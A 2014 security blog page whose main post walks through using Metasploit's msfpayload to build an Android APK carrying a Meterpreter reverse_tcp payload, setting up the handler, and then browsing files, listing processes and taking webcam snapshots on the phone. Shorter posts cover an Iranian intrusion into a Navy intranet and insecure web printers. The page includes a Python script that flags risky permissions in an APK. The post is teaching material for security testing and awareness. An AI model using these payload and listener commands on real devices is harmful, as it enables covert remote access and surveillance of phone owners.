Getting a Remote Shell on an Android Device using Metasploit

Wednesday, February 19, 2014

Dan Dieterle


Metasploit is one of my favorite security tools. What some don’t know is that Metasploit has added functionality for security testing Android devices. In this post we will show you how to get a remote shell on an Android device by using Metasploit in Kali Linux.

We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and, once it sees it, create a fully functional remote shell to the device.

Creating a booby trapped APK file

First up, we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.

1. In Kali Linux, open a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk


The msfpayload command takes one of the Meterpreter payloads and lets you create a stand-alone file from it. You will need to put your Kali Linux IP address in for the LHOST value. You can change the port (LPORT) as well if you would like.

Once this is run, a file called “app.apk” will be created.


2. Now just send this file to your Android device; I used a smartphone in this instance.

3. When the file is installed on the Android device, it will come up like all apps and show you what capabilities it wants access to on your phone. It lists like every possibility, I think, basically total access to the phone. This should be a warning to users that this isn’t an app they should be running!

Now that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.

4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.

5. Once Metasploit starts, type in the following to create a listener:

  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set lhost 192.168.1.16 (enter your Kali IP address)
  • set lport 4444

Then just type exploit to start the handler.

6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.

7. A big button will appear on your phone that says “ReverseTcp”; when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metasploit system you should see the incoming session.

An active session is created and it drops you automatically into a meterpreter prompt.

8. From here you can type “sysinfo” to get information on the device.

9. You can see the processes running by typing “ps”.

You can browse the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.

Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s cameras, then “webcam_snap” to take a snapshot from one of them.

Typing “help” at a meterpreter prompt will list all the commands that are available.

We can also run the shell command that will drop us into a direct Terminal shell if we want:

meterpreter > shell
Process 1 created.
Channel 1 created.
ls

The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.

But if the phone was rooted, I should have been able to access them… Remotely…

This should be noted by people who have rooted their phone!

And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…

Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make phone calls that cost you money, this should be a red flag.
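The permission review described in step 3 and in the paragraph above can be done before an APK ever reaches a phone. The following is an added example, not code from this post: it pulls the android.permission names out of an APK’s binary manifest by string-scanning and flags the ones this post calls out (calls, texts, call logs, camera). The high-risk list is my own selection, and the APK-building helper constructs a stand-in zip for offline testing, not an installable app.

```python
import io
import re
import zipfile

# Permissions the post singles out as red flags: calls that cost money, texts,
# call logs and the camera. Real android.permission names; the selection is mine.
HIGH_RISK = {
    "CALL_PHONE", "SEND_SMS", "READ_SMS", "RECEIVE_SMS", "READ_CALL_LOG",
    "CAMERA", "RECORD_AUDIO", "ACCESS_FINE_LOCATION", "READ_CONTACTS",
}

# A binary AndroidManifest.xml keeps permission names in its string pool as
# UTF-16LE, or UTF-8 when the pool's UTF-8 flag is set, so scan for both.
_UTF8_RE = re.compile(rb"android\.permission\.([A-Z_]+)")
_UTF16_RE = re.compile("android.permission.".encode("utf-16-le").replace(b".", b"\\.")
                       + rb"((?:[A-Z_]\x00)+)")


def manifest_permissions(apk_bytes):
    """Sorted android.permission names found in the APK's manifest.
    A string-scan heuristic for triage, not a full AXML parser."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        manifest = zf.read("AndroidManifest.xml")
    found = {m.group(1).decode() for m in _UTF8_RE.finditer(manifest)}
    found |= {m.group(1).decode("utf-16-le") for m in _UTF16_RE.finditer(manifest)}
    return sorted(found)


def triage(apk_bytes, threshold=3):
    """Flag an APK whose manifest asks for `threshold` or more high-risk permissions."""
    perms = manifest_permissions(apk_bytes)
    risky = [p for p in perms if p in HIGH_RISK]
    return {"requested": perms, "high_risk": risky, "red_flag": len(risky) >= threshold}


def build_sample_apk(perms, encoding="utf-16-le"):
    """Constructed stand-in for an APK: a zip whose AndroidManifest.xml holds
    the given permissions encoded between filler bytes, as they sit in a real
    string pool. Not an installable APK."""
    body = b"\x03\x00\x08\x00"
    for p in perms:
        body += ("android.permission." + p).encode(encoding) + b"\x00\x00"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", body)
    return buf.getvalue()


if __name__ == "__main__":
    # Permission set modelled on what the post's booby-trapped app asks for.
    sample = build_sample_apk(["INTERNET", "CALL_PHONE", "READ_SMS", "CAMERA", "READ_CALL_LOG"])
    print(triage(sample))
```

On a real APK, pass the file’s bytes to triage(); the scan also catches the UTF-8 string-pool variant.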

What’s next with Android support on Meterpreter?

Well, it is not “officially” supported yet, but there is an extension available for Meterpreter that adds several new Android-based commands:

Pretty amazing stuff!

Iran inside US Navy Unclassified Intranet System for Four Months (February 18, 2014)


It took the Navy longer than previously reported to remove Iranian hackers from the Navy and Marine Corps Intranet (NMCI). According to the Wall Street Journal, the hackers had access to the system last year for four months.

The hackers were able to gain access via a hole in a public facing website and conducted surveillance on the intranet, though a senior official told the WSJ that no emails were hacked and no data was extracted.

The NMCI is the largest enterprise network in the world and second only to the internet itself in size. It handles about 70% of the Department of the Navy’s IT needs. It encompasses more than 360,000 computers and 4,100 servers connected together in over 600 locations.

The sheer size of this network makes it very difficult to secure. IT specialists have to make sure everything is kept updated and all security issues are dealt with on the hundreds of thousands of systems.

Attackers just need to find one opening to exploit.

Then once someone does gain access into a network of this size, it can take a long time for security specialists to analyze what was touched, what was compromised and what, if any, backdoors were left.

Though the system is the Navy’s unclassified network, the fact that Iran was able to gain access to this military intranet is very concerning.

“It was a real big deal, it was a significant penetration that showed a weakness in the system,” a senior official told the WSJ.

Of interest to this story too, is that just five days after the breach was initially disclosed last year, an Iranian cyber commander was apparently assassinated.

Iranian Cyber Commander Mojtaba Ahmadi’s body was found in a remote area near Karaj. Initial police reports stated that he had been shot by two men on a motorbike.

An eyewitness reported that there were “two bullet wounds on his body”, and that “the extent of his injuries indicated that he had been assassinated from a close range with a pistol”.

This style of attack seems very similar to a tactic used by Israeli secret agents.

Though it has not been proven that Israel was involved, and Iranian officials later denied that Ahmadi was assassinated, one thing seems true: physical responses to cyber attacks seem to be on the table.

And, you don’t mess with the United States Marine Corps!

Web Enabled Printer (In)Security (February 17, 2014)

In the name of simplicity, it seems like every device is “Web Enabled” now. But the question is, where is the security? I was always stunned at how many printers you can find completely open on the web through Shodan. I never understood why, until now.

I was setting up a brand new “web enabled” printer. It went great, the quick start guide walked me through installing the ink cartridges, had a great video on connecting the paper trays to the printer and how to correctly insert paper.

It even walked me through turning on networking and getting it connected to my Wireless network.

In no time I was up and running!

It wanted to turn on printing from the internet, it got an e-mail address from the web all by itself and then wanted to turn on additional apps. It was so helpful!

But then I wondered, how is this thing secured?!?

So I surfed to the IP address that the printer was assigned, and it had a beautiful web control interface for the printer that was completely unsecured…

I dug through the menus and finally found the option to turn Web Based security to “On” and put in an administrator password. It informed me that it would not block internet users from seeing everything, but would limit them to informational pages only.

Then I realized, it never prompted me to turn control panel security on, and never asked me for a password. So I dug through the included manual (instead of just browsing the quick start guide) thinking I missed something.

Everything was in the manual, including troubleshooting network connectivity. But nowhere did it mention turning security on or how to even do it!

It’s just a printer, you say. But printers can leak some very important information, like internal network settings, logs, files and in some cases, even user accounts.

And a few quick keyword searches on Shodan turn up tens of thousands of insecure printers.

Yikes!

Last month the author of “Shodan Blog” wrote a great article on printers bleeding information publicly.

Titled “I Know You Need Toner”, it lists the printers worldwide that are currently in need of toner.

It also shows the number of printers that need toner by country, and a list of the top organizations that need to change their toner.

Cute, I know, but it should really be a warning to people about what information is being bled publicly through the horde of web enabled devices that we are putting throughout our organizations.

It took several years, but most router manufacturers now ship new routers with some level of security turned on. It looks like other web enabled devices (like printers) need to start doing this too!

CyberArms is Back! Security News, Book Reviews and More (February 17, 2014)

I’ve been out of town for almost two months sans internet and had a long time to think about this blog, among other things. So I figured it was well and about time to kick some new life into it and get it spun up again.

Yes!

I haven’t posted on CyberArms consistently for a long time, yet I am still amazed at the constant flood of visitors that still check in every day. So, I have decided to begin posting regularly again. Yup, security news, computer tips and even some cool military stuff!

New Ethical Hacking Book!

Though I haven’t been posting, I have been fairly busy on other projects. The biggest one is the release of my new book, “Basic Security Testing with Kali Linux”.

Over 300 pages packed full of hands-on, step-by-step Ethical Hacking tutorials. An e-book version will be out later this week!

Navy Base Visit

During my two month “vacation”, I was able to visit one of our top Navy bases. I met some great people, got to see numerous Naval Warships and even got a tour of a Super Carrier!

I also watched the movie “Lone Survivor” on the base. It was a powerful movie, and watching it surrounded by our men and women in the Navy was an experience that I will never forget.

Vice Adm. Rogers Cyber Command Nomination

I was delighted to hear that Vice Admiral Michael Rogers was nominated to be the future leader of both Cyber Command and the NSA. I have had the honor of meeting Vice Adm. Rogers and his wife at a Navy function (non-cybersecurity related) a few years ago.

He was down to Earth, professional, competent and truly seems to be a man of integrity.

I cannot think of a man more qualified to man the helm of our nation’s Cyber War and Signals Intelligence forces.

Books

I was able to catch up on some reading during my vacation too. Here are two of my favorites:

“Information Warfare” is an older book by Winn Schwartau; the Second Edition was published in 1996! I was reading a computer book about 20 years old, yet the content and information still seem very pertinent today.

“Bravo Two Zero” is a first-hand account of a British SAS unit in Iraq during the First Gulf War that evolved into one of the longest Escape and Evasion treks in history. If you liked the movie Lone Survivor, you will love this book.

This blog was cross posted from the Cyber Arms Computer Security blog.

The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.
